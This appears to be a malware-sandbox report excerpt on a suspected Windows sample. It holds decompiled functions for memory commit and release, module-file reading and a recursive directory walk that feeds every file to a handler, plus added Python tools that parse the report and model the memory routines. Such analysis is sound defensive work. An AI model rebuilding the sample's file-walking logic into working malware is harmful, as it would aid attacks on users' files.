                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                            • Instruction ID: 68b303876a78b47fa373b2f01407b4ce5b79aa50a67d4c8f5d0a49418ed6adba
                                                            • Opcode Fuzzy Hash: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                            • Instruction Fuzzy Hash: 69A002D85902203AF8182363AC5FF37105C97C0B55FD0855E7351754C164EC6A241039
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
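The records above all share one layout: a decompiled function header, an "APIs" bullet with the call site and the stack values seen at the call, a "Memory Dump Source" bullet giving the image base, and the similarity/uniqueness fields. The following parser is an added example, not part of the Joe Sandbox report or its tooling: it turns that text into structured records so the call sites can be pivoted on (which functions reach which API, at what RVA). The regexes are this example's own assumptions about the export layout, derived from the records on this page, and the sample input is two of those records copied and trimmed.

```python
"""Structured view of the per-function records in a Joe Sandbox text export.

Added example, not a Joe Sandbox API: the regexes are this example's own assumptions about the
export layout (function header, 'APIs' bullet, 'Memory Dump Source' bullet, 'API ID',
'Uniqueness Score'), derived from the records on the page it accompanies.
"""
import re
from dataclasses import dataclass, field

# Constructed input: two records copied from the report, trimmed to the lines the parser reads.
SAMPLE_REPORT = """\
C-Code - Quality: 58%
    E00404EB0(void* __eax) {
        _t4 = CreateDirectoryA(E0040340C(__eax), 0); // executed
        return _t4 + 1;
    }
APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,?,00404E7A,00000000,00404E9F,?,?,00000000,00000000,00000000,00000000,?,004076D4,00000000,0040798C), ref: 00404EBD
Memory Dump Source
• Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
Similarity
• API ID: CreateDirectory
• API String ID: 4241100979-0
Uniqueness Score: -1.00%

C-Code - Quality: 100%
    E00404BB4(void* __eax, signed int __ecx, long __edx) {
        _t2 = SetFilePointer(__eax, __edx, 0, __ecx & 0x000000ff); // executed
        return _t2;
    }
APIs
• SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
Memory Dump Source
• Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FilePointer
• API String ID: 973152223-0
Uniqueness Score: -1.00%
"""

BULLET = r"^(?:•\s*)?"
QUALITY_RE = re.compile(r"^C-Code - Quality:\s*(\d+)%")
FUNC_RE = re.compile(r"^(E[0-9A-Fa-f]{8})\((.*)\)\s*\{$")
API_RE = re.compile(BULLET + r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(BULLET + r"Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
APIID_RE = re.compile(BULLET + r"API ID:\s*(.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?\d+(?:\.\d+)?)%")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list      # stack values as printed; the first N are the real parameters
    ref: int        # virtual address of the call site
    rva: int = 0    # ref minus the image base from the 'Source File' line


@dataclass
class FunctionRecord:
    name: str
    params: str
    quality: int
    calls: list = field(default_factory=list)
    source_file: str = ""
    image_base: int = 0
    api_id: str = ""
    uniqueness: float = 0.0


def parse_report(text):
    """Walk the export line by line and return one FunctionRecord per decompiled function."""
    records, current, quality = [], None, 0
    for raw in text.splitlines():
        line = raw.strip()
        if m := QUALITY_RE.match(line):
            quality = int(m.group(1))           # the quality line precedes its function header
        elif m := FUNC_RE.match(line):
            current = FunctionRecord(m.group(1), m.group(2), quality)
            records.append(current)
        elif current is None:
            continue
        elif m := API_RE.match(line):
            args = [a.strip() for a in m.group(3).split(",")] if m.group(3) else []
            current.calls.append(ApiCall(m.group(1), m.group(2), args, int(m.group(4), 16)))
        elif m := SOURCE_RE.match(line):
            current.source_file = m.group(1)
            current.image_base = int(m.group(2), 16)
            for call in current.calls:          # call sites are VAs; rebase them for the on-disk PE
                call.rva = call.ref - current.image_base
        elif m := APIID_RE.match(line):
            current.api_id = m.group(1).strip()
        elif m := SCORE_RE.match(line):
            current.uniqueness = float(m.group(1))
    return records


def callers_by_api(records):
    """Invert the records: API name -> [(function, call-site VA, RVA)], for pivoting."""
    index = {}
    for rec in records:
        for call in rec.calls:
            index.setdefault(call.api, []).append((rec.name, call.ref, call.rva))
    return index


if __name__ == "__main__":
    for rec in parse_report(SAMPLE_REPORT):
        for call in rec.calls:
            print(f"{rec.name} -> {call.module}!{call.api} at {call.ref:#010x} "
                  f"(RVA {call.rva:#x}), first args {call.args[:2]}")
```

Only the leading arguments of each "APIs" bullet are the function's real parameters (two for CreateDirectoryA, four for SetFilePointer); the rest are whatever the sandbox saw further up the stack, which is why they contain return addresses such as 00404E7A. The RVA is useful for locating the same call site in the original file with a static tool, given the dump's image base of 00400000.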

                                                            C-Code - Quality: 100%
                                                            			E0040137C(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
                                                            				intOrPtr _v20;
                                                            				intOrPtr _v24;
                                                            				void* _v28;
                                                            				intOrPtr* _v32;
                                                            				intOrPtr* _t24;
                                                            				intOrPtr _t27;
                                                            				intOrPtr _t31;
                                                            				int _t32;
                                                            				intOrPtr* _t35;
                                                            				intOrPtr* _t42;
                                                            				void* _t43;
                                                            				void* _t44;
                                                            				intOrPtr* _t45;
                                                            
                                                            				_t45 =  &_v20;
                                                            				_v32 = __ecx;
                                                            				 *_t45 = __edx;
                                                            				_v28 = 0xffffffff;
                                                            				_v24 = 0;
                                                            				_t44 = __eax;
                                                            				_v20 =  *_t45 + __eax;
                                                            				_t35 =  *0x40a5d4; // 0x47f4cc
                                                            				while(_t35 != 0x40a5d4) {
                                                            					_t42 =  *_t35;
                                                            					_t43 =  *(_t35 + 8);
                                                            					if(_t44 <= _t43 && _t43 +  *((intOrPtr*)(_t35 + 0xc)) <= _v20) {
                                                            						if(_t43 < _v28) {
                                                            							_v28 = _t43;
                                                            						}
                                                            						_t31 = _t43 +  *((intOrPtr*)(_t35 + 0xc));
                                                            						if(_t31 > _v24) {
                                                            							_v24 = _t31;
                                                            						}
                                                            						_t32 = VirtualFree(_t43, 0, 0x8000); // executed
                                                            						if(_t32 == 0) {
                                                            							 *0x40a5b0 = 1;
                                                            						}
                                                            						E00401184(_t35);
                                                            					}
                                                            					_t35 = _t42;
                                                            				}
                                                            				_t24 = _v32;
                                                            				 *_t24 = 0;
                                                            				if(_v24 != 0) {
                                                            					 *_v32 = _v28;
                                                            					_t27 = _v24 - _v28;
                                                            					 *((intOrPtr*)(_v32 + 4)) = _t27;
                                                            					return _t27;
                                                            				}
                                                            				return _t24;
                                                             			}

                                                            APIs
                                                            • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004013E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                            • Instruction ID: f327295f0dbb7d02968337953404c96d08b75f0734ec548ae522820371e35f3d
                                                            • Opcode Fuzzy Hash: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                            • Instruction Fuzzy Hash: CB21E570608741AFD710DF19C880A5FBBE0EB85720F14C96AE8989B7A5D378E841DB5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00401434(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                            				signed int _v20;
                                                            				void** _v24;
                                                            				void* _t15;
                                                            				void** _t16;
                                                            				void* _t17;
                                                            				signed int _t27;
                                                            				intOrPtr* _t29;
                                                            				void* _t31;
                                                            				intOrPtr* _t32;
                                                            
                                                            				_v24 = __ecx;
                                                            				 *_t32 = __edx;
                                                            				_t31 = __eax & 0xfffff000;
                                                            				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                            				 *_v24 = _t31;
                                                            				_t15 = _v20 - _t31;
                                                            				_v24[1] = _t15;
                                                            				_t29 =  *0x40a5d4; // 0x47f4cc
                                                            				while(_t29 != 0x40a5d4) {
                                                            					_t17 =  *(_t29 + 8);
                                                            					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
                                                            					if(_t31 > _t17) {
                                                            						_t17 = _t31;
                                                            					}
                                                            					if(_t27 > _v20) {
                                                            						_t27 = _v20;
                                                            					}
                                                            					if(_t27 > _t17) {
                                                            						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                                            						if(_t15 == 0) {
                                                            							_t16 = _v24;
                                                            							 *_t16 = 0;
                                                            							return _t16;
                                                            						}
                                                            					}
                                                            					_t29 =  *_t29;
                                                            				}
                                                            				return _t15;
                                                             			}

                                                            APIs
                                                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004014A1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                            • Instruction ID: 651c7d6b6741c998796b49b102b161bb2341ec2eea25b0c045f05b7ed0c0d4f4
                                                            • Opcode Fuzzy Hash: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                            • Instruction Fuzzy Hash: E7117072A04701AFC310DF29CD80A2BB7E1EBC4750F15C63DE598673B5D638AC408795
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
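E0040137C and E00401434 above, together with the decommit routine E004014C8 listed next, walk the same linked list of memory blocks headed at 0x40a5d4 (node+8 holds the block base, node+0xc its size) and clip a requested address range to each block before calling VirtualFree or VirtualAlloc. The model below is an added example, not the sample's own code: it reimplements that address arithmetic and list walk in Python with the Win32 calls replaced by a log of the calls that would be made, so the behaviour can be checked on a constructed block list. The constant names are the documented Win32 values for the literals in the decompiled code (0x1000 MEM_COMMIT, 0x4000 MEM_DECOMMIT, 0x8000 MEM_RELEASE, 4 PAGE_READWRITE); the return value when a release matches no block, and the absence of the failure paths that set the flag at 0x40a5b0, are this model's simplifications.

```python
"""Reference model of the page-granular memory routines decompiled in this report.

Added example, not the sample's own code: reimplements the address arithmetic and list walk of
E00401434 (commit), E004014C8 (decommit) and E0040137C (release), logging the VirtualAlloc /
VirtualFree calls instead of making them. Block fields (base at +8, size at +0xc) are taken from
the decompiled code; the empty-release return value is this model's simplification.
"""
PAGE_MASK = 0xFFFFF000                       # the 'and 0xfffff000' in all three routines
MEM_COMMIT, MEM_DECOMMIT, MEM_RELEASE, PAGE_READWRITE = 0x1000, 0x4000, 0x8000, 0x4


class Block:
    """One node of the list headed at 0x40a5d4: base (node+8) and size (node+0xc)."""
    def __init__(self, base, size):
        self.base, self.size = base, size

    @property
    def end(self):
        return self.base + self.size


def commit_range(addr, size, blocks, log):
    """E00401434: round outwards to whole pages, then commit the overlap with each block."""
    start = addr & PAGE_MASK
    end = (addr + size + 0xFFF) & PAGE_MASK
    for blk in blocks:
        lo, hi = max(start, blk.base), min(end, blk.end)
        if hi > lo:
            log.append(("VirtualAlloc", lo, hi - lo, MEM_COMMIT, PAGE_READWRITE))
    return start, end - start                  # what the routine stores through __ecx


def decommit_range(addr, size, blocks, log):
    """E004014C8: round inwards (only pages wholly inside the request), then decommit the overlap."""
    start = (addr + 0xFFF) & PAGE_MASK
    end = (addr + size) & PAGE_MASK
    for blk in blocks:
        lo, hi = max(start, blk.base), min(end, blk.end)
        if hi > lo:
            log.append(("VirtualFree", lo, hi - lo, MEM_DECOMMIT))
    return start, end - start


def release_blocks(addr, size, blocks, log):
    """E0040137C: release and unlink every block lying entirely inside [addr, addr + size)."""
    lowest, highest = 0xFFFFFFFF, 0            # _v28 / _v24 in the decompiled code
    kept = []
    for blk in blocks:
        if addr <= blk.base and blk.end <= addr + size:
            lowest, highest = min(lowest, blk.base), max(highest, blk.end)
            log.append(("VirtualFree", blk.base, 0, MEM_RELEASE))
        else:
            kept.append(blk)
    blocks[:] = kept                           # E00401184 unlinks the node in the original
    return (lowest, highest - lowest) if highest else (0, 0)


if __name__ == "__main__":
    # Constructed block list; nothing is really mapped, the calls are only logged.
    blocks, log = [Block(0x400000, 0x3000), Block(0x410000, 0x2000)], []
    print(commit_range(0x4017FF, 0x1002, blocks, log), log)
    print(decommit_range(0x4017FF, 0x1002, blocks, log), log)
    print(release_blocks(0x400000, 0x12000, blocks, log), log, len(blocks))
```

The asymmetry is the point worth noticing when reading the decompiled code: commit rounds the request outwards to page boundaries, decommit rounds inwards so that a page shared with a neighbouring allocation is never decommitted (a request smaller than one page therefore frees nothing), and release only touches blocks that lie completely inside the range. Each routine clips to every block rather than trusting the caller, so a range spanning two blocks produces one call per block.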

                                                            C-Code - Quality: 93%
                                                            			E004014C8(void* __eax, void** __ecx, void* __edx) {
                                                            				int _t7;
                                                            				void* _t9;
                                                            				signed int _t14;
                                                            				intOrPtr* _t19;
                                                            				signed int _t22;
                                                            				void** _t23;
                                                            
                                                            				_push(__ecx);
                                                            				 *_t23 = __eax + 0x00000fff & 0xfffff000;
                                                            				_t22 = __eax + __edx & 0xfffff000;
                                                            				 *__ecx =  *_t23;
                                                            				_t7 = _t22 -  *_t23;
                                                            				__ecx[1] = _t7;
                                                            				_t19 =  *0x40a5d4; // 0x47f4cc
                                                            				while(_t19 != 0x40a5d4) {
                                                            					_t9 =  *(_t19 + 8);
                                                            					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
                                                            					if(_t9 <  *_t23) {
                                                            						_t9 =  *_t23;
                                                            					}
                                                            					if(_t22 < _t14) {
                                                            						_t14 = _t22;
                                                            					}
                                                            					if(_t14 > _t9) {
                                                            						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
                                                            						if(_t7 == 0) {
                                                            							 *0x40a5b0 = 2;
                                                            						}
                                                            					}
                                                            					_t19 =  *_t19;
                                                            				}
                                                            				return _t7;
                                                             			}

                                                            APIs
                                                            • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,0040172F), ref: 00401522
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                            • Instruction ID: c2f9954cc8299db513f2c37eb2bc070e0fd4fafed15322d1c8bcd52f3136bf23
                                                            • Opcode Fuzzy Hash: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                            • Instruction Fuzzy Hash: E501F7736043006FC3109E28DDC092A77A4EBC5324F15053EDA85AB3A1D73AAC0587A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 31%
                                                            			E004070DC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				char _v8;
                                                            				intOrPtr _t19;
                                                            				intOrPtr _t24;
                                                            
                                                            				_push(0);
                                                            				_push(_t24);
                                                            				_push(0x407126);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t24;
                                                            				E004049D0(0, __ebx,  &_v8, __edi, __esi); // executed
                                                            				E00404C78(E0040340C(_v8), __ebx, 0xa200, 0x40a698, __edi, __esi); // executed
                                                            				_pop(_t19);
                                                            				 *[fs:eax] = _t19;
                                                            				_push(E0040712D);
                                                            				return E00403094( &_v8);
                                                            			}

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileModuleName
                                                            • String ID: MZP
                                                            • API String ID: 514040917-2889622443
                                                            • Opcode ID: 2f22c95ce754a069faf3e5d71a99af3f29d8e87556c895829c3b73c460f21ff1
                                                            • Instruction ID: dbacf8f9bda0d2f3624fed2e55e69454661720eb62c3ca271fb24a4619442e3b
                                                            • Opcode Fuzzy Hash: 2f22c95ce754a069faf3e5d71a99af3f29d8e87556c895829c3b73c460f21ff1
                                                            • Instruction Fuzzy Hash: 32E09270708304AFE701EB72DC13A19B7ACD78A704FA24877E600AA6D1DA7DAE118519
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404B90(void* __eax) {
                                                            				signed int _t4;
                                                            
                                                            				_t4 = CloseHandle(__eax); // executed
                                                            				return _t4 & 0xffffff00 | _t4 != 0x00000000;
                                                            			}

                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000,00404CD0,00000000,00404CE6), ref: 00404B91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                            • Instruction ID: f540dd3953723152695a7cfd94b4b723d26dbf970bde7b3718d3bc06e0259ed2
                                                            • Opcode Fuzzy Hash: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                            • Instruction Fuzzy Hash:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 52%
                                                            			E00407678(void* __ebx, void* __edi, void* __esi) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v12;
                                                            				char _v16;
                                                            				char _v40254;
                                                            				char _v41488;
                                                            				char _v41492;
                                                            				char _v41496;
                                                            				intOrPtr _v41500;
                                                            				char _v41504;
                                                            				char _v41508;
                                                            				char _v41512;
                                                            				char _v41516;
                                                            				intOrPtr _v41520;
                                                            				char _v41524;
                                                            				char _v41528;
                                                            				char _v41532;
                                                            				char _v41536;
                                                            				void* _t49;
                                                            				void* _t101;
                                                            				intOrPtr _t133;
                                                            				intOrPtr _t137;
                                                            				intOrPtr _t138;
                                                            
                                                            				_t100 = __ebx;
                                                            				_t137 = _t138;
                                                            				_t101 = 0x144b;
                                                            				do {
                                                            					_push(0);
                                                            					_push(0);
                                                            					_t101 = _t101 - 1;
                                                            					_t139 = _t101;
                                                            				} while (_t101 != 0);
                                                            				_push(_t101);
                                                            				_push(_t137);
                                                            				_push(0x40798c);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t138;
                                                            				E00405008( &_v41492, __ebx, _t101);
                                                            				_push( &_v41492);
                                                            				E004031F4( &_v41496, 9, 0x4091b4);
                                                            				_pop(_t49);
                                                            				E00403214(_t49, _v41496);
                                                            				E00404DE0(_v41492, __ebx); // executed
                                                            				E00405008( &_v41504, __ebx, 9);
                                                            				_push(_v41504);
                                                            				E004031F4( &_v41508, 9, 0x4091b4);
                                                            				_push(_v41508);
                                                            				E004031F4( &_v41512, 3, 0x4091dc);
                                                            				_push(_v41512);
                                                            				E004032CC();
                                                            				E00405200(_v41500, __ebx, __esi, _t139); // executed
                                                            				E004049D0(0, _t100,  &_v41516, __edi, __esi);
                                                            				_v8 = E00405B60(_v41516,  &_v41516);
                                                            				_push(_t137);
                                                            				_push(0x40789f);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t138;
                                                            				E00405008( &_v41524, _t100, 3);
                                                            				_push(_v41524);
                                                            				E004031F4( &_v41528, 9, 0x4091b4);
                                                            				_push(_v41528);
                                                            				E004049D0(0, _t100,  &_v41536, __edi, __esi);
                                                            				E00404ED0(_v41536,  &_v41532);
                                                            				_push(_v41532);
                                                            				E004032CC();
                                                            				_v12 = E00405B24(_v41520, 0x40000103);
                                                            				_push(_t137);
                                                            				_push(0x407882);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t138;
                                                            				E0040597C(_v8);
                                                            				E00405974();
                                                            				E00405988(_v8);
                                                            				E0040254C( &_v40254, 4,  &_v16);
                                                            				E00407080( &_v41488, _v16, 0x3e8);
                                                            				E0040598C(_v12);
                                                            				E00405974();
                                                            				E00405BE8(_v12, E0040597C(_v8) - 0x14400, _v8);
                                                            				_pop(_t133);
                                                            				 *[fs:eax] = _t133;
                                                            				_push(E00407889);
                                                            				return E00404520(_v12);
                                                            			}

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e2ffbce9ad41ee186f7f6225872613ed6a0bd1f14c14150b1f77e3a925856f57
                                                            • Instruction ID: bad4d56910de55197467fd61e6ec6c56c875cf63360af75c5594bc2395637eb8
                                                            • Opcode Fuzzy Hash: e2ffbce9ad41ee186f7f6225872613ed6a0bd1f14c14150b1f77e3a925856f57
                                                            • Instruction Fuzzy Hash: 42514170B002199BDF10EB69CC51A9DB7B5EB46308F1084FAA404772D1DA3DAF458E5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                            				void* _v24;
                                                            				char _v28;
                                                            				void* _v32;
                                                            				char _v36;
                                                            				intOrPtr _t26;
                                                            				void* _t36;
                                                            				void* _t47;
                                                            				void* _t48;
                                                            				intOrPtr _t71;
                                                            				void* _t79;
                                                            				void* _t81;
                                                            				void* _t86;
                                                            
                                                            				_t86 = __fp0;
                                                            				_t81 = __eflags;
                                                            				_t76 = __esi;
                                                            				_t75 = __edi;
                                                            				_t54 = __ebx;
                                                            				_v36 = 0;
                                                            				_v28 = 0;
                                                            				_v32 = 0;
                                                            				_v24 = 0;
                                                            				E00403F14(0x408054);
                                                            				_push(_t79);
                                                            				_push(0x408220);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t79 + 0xffffffe0;
                                                            				E00407080(0x4091a8, 0xb, 0xb);
                                                            				E00407080(0x4091b4, 9, 9);
                                                            				E00407080(0x4091c0, 3, 3);
                                                            				E00407080(0x4091dc, 3, 3);
                                                            				_t26 =  *0x409210; // 0x40919c
                                                            				E00407080(_t26, 0xb, 0xb); // executed
                                                            				E004070DC(__ebx, __edi, __esi, _t81); // executed
                                                            				E004049D0(0, __ebx,  &_v24, __edi, __esi);
                                                            				if(E00404F6C(_v24) > 0xa200) {
                                                            					E00407678(_t54, _t75, _t76); // executed
                                                            				}
                                                            				E00407E90(_t54, _t75, _t76); // executed
                                                            				_t60 = 3;
                                                            				_t70 = 3;
                                                            				E00407080(0x4091c4, 3, 3);
                                                            				_t36 = E00404AE8(_t54, _t75, _t76);
                                                            				_t83 = _t36;
                                                            				if(_t36 != 0) {
                                                            					E004049D0(0, _t54,  &_v28, _t75, _t76);
                                                            					_push(_v28);
                                                            					_t60 = 3;
                                                            					E004031F4( &_v32, 3, 0x4091c4);
                                                            					_t70 = _v32;
                                                            					_pop(_t47);
                                                            					_t48 = E00406FE4(_t47, _t54, _v32, _t83);
                                                            					_t84 = _t48;
                                                            					if(_t48 != 0) {
                                                            						_t70 =  &_v36;
                                                            						E004049D0(1, _t54,  &_v36, _t75, _t76);
                                                            						E00407D9C(_v36, _t54,  &_v36, _t75, _t76); // executed
                                                            					}
                                                            				}
                                                            				E004079A0(_t54, _t75, _t76, _t84); // executed
                                                            				E0040759C(_t54, _t60, _t70, _t75, _t76, _t84, _t86); // executed
                                                            				_pop(_t71);
                                                            				 *[fs:eax] = _t71;
                                                            				_push(0x408227);
                                                            				return E004030B8( &_v36, 4);
                                                            			}

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileFindModule$CloseFirstHandleName
                                                            • String ID:
                                                            • API String ID: 2572062711-0
                                                            • Opcode ID: 6d70fba820807f475e386924a9e2af15878d2dd69a0bc15187a92624e301fe42
                                                            • Instruction ID: ce7274d5a0203330cd45a7cf6d0e011d083bf460e717dce8afa0a39e5ced3773
                                                            • Opcode Fuzzy Hash: 6d70fba820807f475e386924a9e2af15878d2dd69a0bc15187a92624e301fe42
                                                            • Instruction Fuzzy Hash: D4211E70B142054BEB40B7B6C95279F76A5DB88304F50493FE544BB3C2DA3DAD0586AE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E004074B4(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                            				// Recursive directory walk (inferred from the shape of the code, the report
                                                            				// does not name it): __eax is a path string, E004052AC lists its entries
                                                            				// (that function's API ID is FileFind$FirstNext), and each entry either goes
                                                            				// to E004071D0 or re-enters this function with the joined sub-path.
                                                            				intOrPtr _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				void* _t34;
                                                            				intOrPtr _t62;
                                                            				void* _t71;
                                                            				void* _t72;
                                                            				void* _t74;
                                                            				intOrPtr _t77;
                                                            
                                                            				_push(0); // six zeroed slots: the string locals released in the finally block
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_v8 = __eax;                       // directory path to walk
                                                            				E004033FC(_v8);
                                                            				_push(_t77);
                                                            				_push(0x40758b);                   // Delphi-style SEH frame; 0x40758b is the finally handler
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t77;
                                                            				E004031F4( &_v12, 3, 0x4091dc);    // _v12 = 3-byte string constant at 0x4091dc, third argument of E004052AC below
                                                            				_t49 = E004052AC(_v8, 0, _v12);    // enumerate _v8; returns a list object
                                                            				_t71 = E0040532C(_t25) - 1;        // entry count - 1 (_t25 is the decompiler's alias for the object just returned in _t49)
                                                            				if(_t71 >= 0) {
                                                            					_t72 = _t71 + 1;                // entries left
                                                            					_t74 = 0;                       // current index
                                                            					do {
                                                            						_t34 = E0040534C(_t49, _t74);      // per-entry value: zero selects the E004071D0 branch, non-zero the recursive one
                                                            						_t81 = _t34;
                                                            						if(_t34 == 0) {
                                                            							E00405338(_t49,  &_v28, _t74);                            // _v28 = entry name
                                                            							E00403258( &_v24, _v28,  *((intOrPtr*)(_t49 + 0x1c)));    // _v24 = name joined with the path stored at list+0x1c
                                                            							E004071D0(_v24, _t49, _t72, _t74); // executed            // per-file handler
                                                            						} else {
                                                            							E00405338(_t49,  &_v20, _t74);
                                                            							E00403258( &_v16, _v20,  *((intOrPtr*)(_t49 + 0x1c)));
                                                            							E004074B4(_v16, _t49, _t72, _t74, _t81, _a4); // executed // recurse into the joined sub-path
                                                            						}
                                                            						_t74 = _t74 + 1;
                                                            						_t72 = _t72 - 1;
                                                            					} while (_t72 != 0);
                                                            				}
                                                            				E00404520(_t49);                   // free the list object
                                                            				_pop(_t62);
                                                            				 *[fs:eax] = _t62;                 // unlink the SEH frame
                                                            				_push(E00407592);
                                                            				return E004030B8( &_v28, 6);       // finally: release the six string locals _v28 .. _v8
                                                            			}

                                                            Instruction addresses of the listing above (one per decompiled line): 0x004074b9 to 0x0040758a

                                                            Memory Dump Source
